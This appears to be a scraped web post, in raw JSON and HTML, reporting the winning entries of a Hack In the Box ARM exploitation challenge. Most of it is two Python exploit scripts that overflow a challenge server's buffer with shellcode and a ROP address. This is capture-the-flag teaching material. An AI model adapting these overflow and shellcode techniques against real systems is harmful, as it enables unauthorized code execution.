{"id":12656,"date":"2018-06-22T14:19:06","date_gmt":"2018-06-22T22:19:06","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/06\/22\/news-6424\/"},"modified":"2018-06-22T14:19:06","modified_gmt":"2018-06-22T22:19:06","slug":"news-6424","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2018\/06\/22\/news-6424\/","title":{"rendered":"beVX Conference Challenge \u2013 HiTB"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Noam Rathaus| Date: Fri, 22 Jun 2018 11:30:44 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p>During the event of Hack In the Box, we launched an ARM reverse engineering and exploitation challenge and gave the attendees the change to win great prizes.<\/p>\n<p>The challenge was divided into two parts, a file &#8211; can be downloaded from here: <a href=\"https:\/\/www.beyondsecurity.com\/bevxcon\/bevx-challenge-10\" rel=\"noopener\" target=\"_blank\">https:\/\/www.beyondsecurity.com\/bevxcon\/bevx-challenge-10<\/a> &#8211; that you had to download and reverse engineer and server that you had to access to have a running version of this file.<\/p>\n<p>The challenge consisted of a binary that is acting as a &#8216;server&#8217; which expects incoming connections to it, when an incoming connection occurs and a certain &#8216;protocol&#8217; is implemented and it will print out &#8216;All your base&#8217; and exit. The challenge was to write an exploit that will cause the program to print out &#8216;Belong to us!&#8217;.<\/p>\n<p>The intended way of solving this challenge was to preform an overflow and cause the execution path of the code to change, while one of the solutions provided did not follow this path &#8211; and was still able to change the output of the program.<\/p>\n<p>We received several submissions, only two were complete and solved the challenge completely, others were close but did not meet our minimum requirements and therefore are not presented here.<br \/> <strong>ebux25<\/strong><br \/> In this submission, the execution path is not overwritten rather the string displayed is changed such that the program does not crash while it still prints the required string. While this was not the intended idea of the challenge, there was no rule against this kind of solution.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b2d75d984422351953327\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">Python<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;  #  # Bevx challange submission 2 (https:\/\/www.beyondsecurity.com\/bevxcon\/bevx-challenge-10)  #  by Gergely Eberhardt (@ebux25)  #       #  # Usage:  #   bevx_exp.py &lt;server ip address&gt;  #  #&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;    import socket  import sys  import struct  import binascii    if (len(sys.argv) &lt; 2):      print &#8216;bevx_exp.py addr&#8217;    port = 2323  addr = sys.argv[1]    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s.connect((addr, port))  #message = &#8216;x12xffx2fxe1&#8217;+&#8217;Belong to us!&#8217;  message = &#8216;x12x1fx2fx11&#8217;+&#8217;Belong to us!&#8217;    # initialize buffer  #   8 bytes: id  #   message  #   dummy  data = &#8216;;*k%:Znx01&#8217;+message+&#8217; &#8216;*(0x78-len(message))  data += &#8216;x11x12xd8x00&#8217;+&#8217;x0cx00xdaxda&#8217;+&#8217;x15x12xd8x00x00x00x00&#8217;    print binascii.hexlify(data)  s.sendall(data)    s.sendall(message)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0051 seconds] -->  <\/p>\n<p><strong>yohanes<\/strong><br \/> The solution provided by yohanes, was meeting more our expectations to what we were looking, it changes the execution code path.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b2d75d984430317233438\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">Python<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #Yohanes Nugroho  #Twitter\/github\/gmail: @yohanes\/@yohanes  import socket  import struct  import sys    if len(sys.argv)&lt;2:      print &#8220;usage: client.py &lt;host&gt; n&#8221;      print &#8220;will use port 2323n&#8221;      exit(0)    host = sys.argv[1]    ch2 = &#8220;3a5a6e01&#8221;.decode(&#8220;heX&#8221;)  ch1 = &#8220;3b2a6b25&#8221;.decode(&#8220;hex&#8221;)  r2 = &#8220;xc6x80x5ax17&#8221;   r3 = &#8220;xe1x80x80xcd&#8221;  ip =  &#8220;x80x74&#8221; #ROP TO id87480    # r2 ^ r3 will result in address 0xdada0027    payload_asm = &#8220;&#8221;&#8221;  #overwrite string  movs r0, r0   movs r0, r0  str r3, [r3]  movs r2, #8  strb r2, [r3] ; offset to string belong to us  ldr r3, [r3]  movs r2, #13  lsls r2, r2, #4  lsls r2, r2, #4  adds r2, #76  negs r2, r2  add r2, r2, r9  ldr r2, [r2]  ldr r2, [r2]  ldr r4, [r3]  str r4, [r2]  ldr r4, [r3, 4]  str r4, [r2, 4]  adds r3, r3, #8  adds r2, r2, #8  ldr r4, [r3]  str r4, [r2]  ldr r4, [r3, 4]  str r4, [r2, 4]  #return  movs r2, #14  lsls r2, r2, #4  lsls r2, r2, #4  adds r2, #53  negs r2, r2  add r2, r2, r9  bx r2  &#8220;&#8221;&#8221;    payload = &#8220;x00x00x00x00x1bx60x08x22x1ax70x1bx68x0dx22x12x01x12x01x4cx32x52x42x4ax44x12x68x12x68x1cx68x14x60x5cx68x54x60x08x33x08x32x1cx68x14x60x5cx68x54x60x0ex22x12x01x12x01x35x32x52x42x4ax44x10x47&#8221;      payload += &#8220;x00x68&#8221; # this will make it crash, used to check register values    n = 128 &#8211; 38 &#8211; len(payload)   #print &#8220;LEFT &#8220;, n # how much shell code space left    tous = &#8220;Belong to us!x00&#8221;  padding1 = &#8220;B&#8221; * (30 &#8211; len (tous))    padding2 = &#8220;A&#8221; * n  pl = ch1+ch2+tous + padding1+ payload + padding2 +r2 + r3 + ip     #this will make sure we can encode\/decode the string as UTF-8  print &#8220;IS OK &#8220;, pl.decode(&#8220;utf-8&#8221;).encode(&#8220;utf-8&#8221;)==pl  print &#8220;Sending payload n&#8221;, pl    s = socket.create_connection((host, 2323))  s.sendall(pl)    s.recv(1)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b2d75d984430317233438-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b2d75d984430317233438-79\">79<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-1\"><span class=\"crayon-c\">#Yohanes Nugroho<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-2\"><span class=\"crayon-c\">#Twitter\/github\/gmail: @yohanes\/@yohanes<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-3\"><span class=\"crayon-r\">import<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">socket<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-4\"><span class=\"crayon-r\">import<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">struct<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-5\"><span class=\"crayon-r\">import<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">sys<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-7\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-k\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;usage: client.py &lt;host&gt; n&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;will use port 2323n&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-11\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-12\"><span class=\"crayon-v\">host<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-14\"><span class=\"crayon-v\">ch2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;3a5a6e01&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">decode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;heX&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-15\"><span class=\"crayon-v\">ch1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;3b2a6b25&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">decode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;hex&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-16\"><span class=\"crayon-v\">r2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;xc6x80x5ax17&#8221;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-17\"><span class=\"crayon-v\">r3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;xe1x80x80xcd&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-18\"><span class=\"crayon-v\">ip<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;x80x74&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">#ROP TO id87480<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-20\"><span class=\"crayon-c\"># r2 ^ r3 will result in address 0xdada0027<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-21\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-22\"><span class=\"crayon-v\">payload_asm<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-23\"><span class=\"crayon-s\">#overwrite string<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-24\"><span class=\"crayon-s\">movs r0, r0 <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-25\"><span class=\"crayon-s\">movs r0, r0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-26\"><span class=\"crayon-s\">str r3, [r3]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-27\"><span class=\"crayon-s\">movs r2, #8<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-28\"><span class=\"crayon-s\">strb r2, [r3] ; offset to string belong to us<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-29\"><span class=\"crayon-s\">ldr r3, [r3]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-30\"><span class=\"crayon-s\">movs r2, #13<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-31\"><span class=\"crayon-s\">lsls r2, r2, #4<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-32\"><span class=\"crayon-s\">lsls r2, r2, #4<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-33\"><span class=\"crayon-s\">adds r2, #76<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-34\"><span class=\"crayon-s\">negs r2, r2<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-35\"><span class=\"crayon-s\">add r2, r2, r9<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-36\"><span class=\"crayon-s\">ldr r2, [r2]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-37\"><span class=\"crayon-s\">ldr r2, [r2]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-38\"><span class=\"crayon-s\">ldr r4, [r3]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-39\"><span class=\"crayon-s\">str r4, [r2]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-40\"><span class=\"crayon-s\">ldr r4, [r3, 4]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-41\"><span class=\"crayon-s\">str r4, [r2, 4]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-42\"><span class=\"crayon-s\">adds r3, r3, #8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-43\"><span class=\"crayon-s\">adds r2, r2, #8<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-44\"><span class=\"crayon-s\">ldr r4, [r3]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-45\"><span class=\"crayon-s\">str r4, [r2]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-46\"><span class=\"crayon-s\">ldr r4, [r3, 4]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-47\"><span class=\"crayon-s\">str r4, [r2, 4]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-48\"><span class=\"crayon-s\">#return<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-49\"><span class=\"crayon-s\">movs r2, #14<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-50\"><span class=\"crayon-s\">lsls r2, r2, #4<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-51\"><span class=\"crayon-s\">lsls r2, r2, #4<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-52\"><span class=\"crayon-s\">adds r2, #53<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-53\"><span class=\"crayon-s\">negs r2, r2<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-54\"><span class=\"crayon-s\">add r2, r2, r9<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-55\"><span class=\"crayon-s\">bx r2<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-56\"><span class=\"crayon-s\">&#8220;&#8221;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-57\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-58\"><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x00x00x00x00x1bx60x08x22x1ax70x1bx68x0dx22x12x01x12x01x4cx32x52x42x4ax44x12x68x12x68x1cx68x14x60x5cx68x54x60x08x33x08x32x1cx68x14x60x5cx68x54x60x0ex22x12x01x12x01x35x32x52x42x4ax44x10x47&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b2d75d984430317233438-59\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b2d75d984430317233438-60\">&nbsp;<\/div>\n<div class=\"crayon-line\" 